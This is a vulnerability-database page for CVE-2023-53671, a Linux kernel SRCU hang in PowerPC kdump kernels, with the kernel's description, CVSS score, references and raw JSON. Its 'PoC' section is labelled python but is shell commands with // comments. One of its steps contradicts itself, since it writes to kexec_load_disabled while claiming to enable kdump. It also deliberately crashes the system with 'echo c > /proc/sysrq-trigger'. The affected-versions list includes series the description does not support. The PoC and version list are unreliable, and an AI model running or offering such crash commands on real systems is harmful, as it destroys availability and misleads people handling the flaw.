CVE-2023-53671

Description

In the Linux kernel, the following vulnerability has been resolved: srcu: Delegate work to the boot cpu if using SRCU_SIZE_SMALL Commit 994f706872e6 ("srcu: Make Tree SRCU able to operate without snp_node array") assumes that cpu 0 is always online. However, there really are situations when some other CPU is the boot CPU, for example, when booting a kdump kernel with the maxcpus=1 boot parameter. On PowerPC, the kdump kernel can hang as follows: ... [ 1.740036] systemd[1]: Hostname set to <xyz.com> [ 243.686240] INFO: task systemd:1 blocked for more than 122 seconds. [ 243.686264] Not tainted 6.1.0-rc1 #1 [ 243.686272] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 243.686281] task:systemd state:D stack:0 pid:1 ppid:0 flags:0x00042000 [ 243.686296] Call Trace: [ 243.686301] [c000000016657640] [c000000016657670] 0xc000000016657670 (unreliable) [ 243.686317] [c000000016657830] [c00000001001dec0] __switch_to+0x130/0x220 [ 243.686333] [c000000016657890] [c000000010f607b8] __schedule+0x1f8/0x580 [ 243.686347] [c000000016657940] [c000000010f60bb4] schedule+0x74/0x140 [ 243.686361] [c0000000166579b0] [c000000010f699b8] schedule_timeout+0x168/0x1c0 [ 243.686374] [c000000016657a80] [c000000010f61de8] __wait_for_common+0x148/0x360 [ 243.686387] [c000000016657b20] [c000000010176bb0] __flush_work.isra.0+0x1c0/0x3d0 [ 243.686401] [c000000016657bb0] [c0000000105f2768] fsnotify_wait_marks_destroyed+0x28/0x40 [ 243.686415] [c000000016657bd0] [c0000000105f21b8] fsnotify_destroy_group+0x68/0x160 [ 243.686428] [c000000016657c40] [c0000000105f6500] inotify_release+0x30/0xa0 [ 243.686440] [c000000016657cb0] [c0000000105751a8] __fput+0xc8/0x350 [ 243.686452] [c000000016657d00] [c00000001017d524] task_work_run+0xe4/0x170 [ 243.686464] [c000000016657d50] [c000000010020e94] do_notify_resume+0x134/0x140 [ 243.686478] [c000000016657d80] [c00000001002eb18] interrupt_exit_user_prepare_main+0x198/0x270 [ 243.686493] [c000000016657de0] [c00000001002ec60] syscall_exit_prepare+0x70/0x180 [ 243.686505] [c000000016657e10] [c00000001000bf7c] system_call_vectored_common+0xfc/0x280 [ 243.686520] --- interrupt: 3000 at 0x7fffa47d5ba4 [ 243.686528] NIP: 00007fffa47d5ba4 LR: 0000000000000000 CTR: 0000000000000000 [ 243.686538] REGS: c000000016657e80 TRAP: 3000 Not tainted (6.1.0-rc1) [ 243.686548] MSR: 800000000000d033 <SF,EE,PR,ME,IR,DR,RI,LE> CR: 42044440 XER: 00000000 [ 243.686572] IRQMASK: 0 [ 243.686572] GPR00: 0000000000000006 00007ffffa606710 00007fffa48e7200 0000000000000000 [ 243.686572] GPR04: 0000000000000002 000000000000000a 0000000000000000 0000000000000001 [ 243.686572] GPR08: 000001000c172dd0 0000000000000000 0000000000000000 0000000000000000 [ 243.686572] GPR12: 0000000000000000 00007fffa4ff4bc0 0000000000000000 0000000000000000 [ 243.686572] GPR16: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 [ 243.686572] GPR20: 0000000132dfdc50 000000000000000e 0000000000189375 0000000000000000 [ 243.686572] GPR24: 00007ffffa606ae0 0000000000000005 000001000c185490 000001000c172570 [ 243.686572] GPR28: 000001000c172990 000001000c184850 000001000c172e00 00007fffa4fedd98 [ 243.686683] NIP [00007fffa47d5ba4] 0x7fffa47d5ba4 [ 243.686691] LR [0000000000000000] 0x0 [ 243.686698] --- interrupt: 3000 [ 243.686708] INFO: task kworker/u16:1:24 blocked for more than 122 seconds. [ 243.686717] Not tainted 6.1.0-rc1 #1 [ 243.686724] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 243.686733] task:kworker/u16:1 state:D stack:0 pid:24 ppid:2 flags:0x00000800 [ 243.686747] Workqueue: events_unbound fsnotify_mark_destroy_workfn [ 243.686758] Call Trace: [ 243.686762] [c0000000166736e0] [c00000004fd91000] 0xc00000004fd91000 (unreliable) [ 243.686775] [c0000000166738d0] [c00000001001dec0] __switch_to+0x130/0x220 [ 243.686788] [c000000016673930] [c000000010f607b8] __schedule+0x1f8/0x ---truncated---

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 6.1（受commit 994f706872e6影响的版本）

Linux Kernel 6.1.0-rc1（漏洞报告中确认受影响的版本）

Linux Kernel 6.0.x系列

Linux Kernel 5.19.x系列

Linux Kernel 5.15.x LTS系列

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC: Trigger CVE-2023-53671 by booting a kdump kernel with maxcpus=1 on PowerPC
// This causes a non-zero CPU to be the boot CPU, triggering the SRCU hang

// Step 1: Configure kdump on a PowerPC system
// Ensure kdump is enabled in the system:
echo "1" > /proc/sys/kernel/kexec_load_disabled

// Step 2: Load a kdump kernel with maxcpus=1 parameter
// This forces the kdump kernel to boot with only 1 CPU,
// and on PowerPC, this CPU may not be CPU 0
kexec -p /boot/vmlinuz-kdump \
  --initrd=/boot/initramfs-kdump.img \
  --append="maxcpus=1 irqpoll nr_cpus=1 reset_devices"

// Step 3: Trigger the crash to boot into kdump kernel
echo c > /proc/sysrq-trigger

// Step 4: Observe the system hang
// After booting into kdump kernel, the system will hang
// because SRCU tries to delegate work to CPU 0 which is offline
// Check kernel logs for:
// "INFO: task systemd:1 blocked for more than 122 seconds."
// "INFO: task kworker/u16:1:24 blocked for more than 122 seconds."

// Verification command to check if the system is hung:
dmesg | grep -i "blocked for more than"

// Expected output showing the hang:
// [  243.686240] INFO: task systemd:1 blocked for more than 122 seconds.
// [  243.686708] INFO: task kworker/u16:1:24 blocked for more than 122 seconds.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53671
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53671
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53671/
[4] VulDB https://vuldb.com/cve/CVE-2023-53671
[5] https://git.kernel.org/stable/c/2c4d26dad76eadaa45a24543e311e9ce5d09f04e
[6] https://git.kernel.org/stable/c/7f24626d6dd844bfc6d1f492d214d29c86d02550
[7] https://git.kernel.org/stable/c/c7c0bc03fa44942fe0fdc5ac52cda6e11529c0ea

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53671", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:51.000", "lastModified": "2026-02-26T23:15:00.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsrcu: Delegate work to the boot cpu if using SRCU_SIZE_SMALL\n\nCommit 994f706872e6 (\"srcu: Make Tree SRCU able to operate without\nsnp_node array\") assumes that cpu 0 is always online. However, there\nreally are situations when some other CPU is the boot CPU, for example,\nwhen booting a kdump kernel with the maxcpus=1 boot parameter.\n\nOn PowerPC, the kdump kernel can hang as follows:\n...\n[ 1.740036] systemd[1]: Hostname set to <xyz.com>\n[ 243.686240] INFO: task systemd:1 blocked for more than 122 seconds.\n[ 243.686264] Not tainted 6.1.0-rc1 #1\n[ 243.686272] \"echo 0 > /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n[ 243.686281] task:systemd state:D stack:0 pid:1 ppid:0 flags:0x00042000\n[ 243.686296] Call Trace:\n[ 243.686301] [c000000016657640] [c000000016657670] 0xc000000016657670 (unreliable)\n[ 243.686317] [c000000016657830] [c00000001001dec0] __switch_to+0x130/0x220\n[ 243.686333] [c000000016657890] [c000000010f607b8] __schedule+0x1f8/0x580\n[ 243.686347] [c000000016657940] [c000000010f60bb4] schedule+0x74/0x140\n[ 243.686361] [c0000000166579b0] [c000000010f699b8] schedule_timeout+0x168/0x1c0\n[ 243.686374] [c000000016657a80] [c000000010f61de8] __wait_for_common+0x148/0x360\n[ 243.686387] [c000000016657b20] [c000000010176bb0] __flush_work.isra.0+0x1c0/0x3d0\n[ 243.686401] [c000000016657bb0] [c0000000105f2768] fsnotify_wait_marks_destroyed+0x28/0x40\n[ 243.686415] [c000000016657bd0] [c0000000105f21b8] fsnotify_destroy_group+0x68/0x160\n[ 243.686428] [c000000016657c40] [c0000000105f6500] inotify_release+0x30/0xa0\n[ 243.686440] [c000000016657cb0] [c0000000105751a8] __fput+0xc8/0x350\n[ 243.686452] [c000000016657d00] [c00000001017d524] task_work_run+0xe4/0x170\n[ 243.686464] [c000000016657d50] [c000000010020e94] do_notify_resume+0x134/0x140\n[ 243.686478] [c000000016657d80] [c00000001002eb18] interrupt_exit_user_prepare_main+0x198/0x270\n[ 243.686493] [c000000016657de0] [c00000001002ec60] syscall_exit_prepare+0x70/0x180\n[ 243.686505] [c000000016657e10] [c00000001000bf7c] system_call_vectored_common+0xfc/0x280\n[ 243.686520] --- interrupt: 3000 at 0x7fffa47d5ba4\n[ 243.686528] NIP: 00007fffa47d5ba4 LR: 0000000000000000 CTR: 0000000000000000\n[ 243.686538] REGS: c000000016657e80 TRAP: 3000 Not tainted (6.1.0-rc1)\n[ 243.686548] MSR: 800000000000d033 <SF,EE,PR,ME,IR,DR,RI,LE> CR: 42044440 XER: 00000000\n[ 243.686572] IRQMASK: 0\n[ 243.686572] GPR00: 0000000000000006 00007ffffa606710 00007fffa48e7200 0000000000000000\n[ 243.686572] GPR04: 0000000000000002 000000000000000a 0000000000000000 0000000000000001\n[ 243.686572] GPR08: 000001000c172dd0 0000000000000000 0000000000000000 0000000000000000\n[ 243.686572] GPR12: 0000000000000000 00007fffa4ff4bc0 0000000000000000 0000000000000000\n[ 243.686572] GPR16: 0000000000000000 0000000000000000 0000000000000000 0000000000000000\n[ 243.686572] GPR20: 0000000132dfdc50 000000000000000e 0000000000189375 0000000000000000\n[ 243.686572] GPR24: 00007ffffa606ae0 0000000000000005 000001000c185490 000001000c172570\n[ 243.686572] GPR28: 000001000c172990 000001000c184850 000001000c172e00 00007fffa4fedd98\n[ 243.686683] NIP [00007fffa47d5ba4] 0x7fffa47d5ba4\n[ 243.686691] LR [0000000000000000] 0x0\n[ 243.686698] --- interrupt: 3000\n[ 243.686708] INFO: task kworker/u16:1:24 blocked for more than 122 seconds.\n[ 243.686717] Not tainted 6.1.0-rc1 #1\n[ 243.686724] \"echo 0 > /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n[ 243.686733] task:kworker/u16:1 state:D stack:0 pid:24 ppid:2 flags:0x00000800\n[ 243.686747] Workqueue: events_unbound fsnotify_mark_destroy_workfn\n[ 243.686758] Call Trace:\n[ 243.686762] [c0000000166736e0] [c00000004fd91000] 0xc00000004fd91000 (unreliable)\n[ 243.686775] [c0000000166738d0] [c00000001001dec0] __switch_to+0x130/0x220\n[ 243.686788] [c000000016673930] [c000000010f607b8] __schedule+0x1f8/0x\n---truncated---"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false ... (truncated)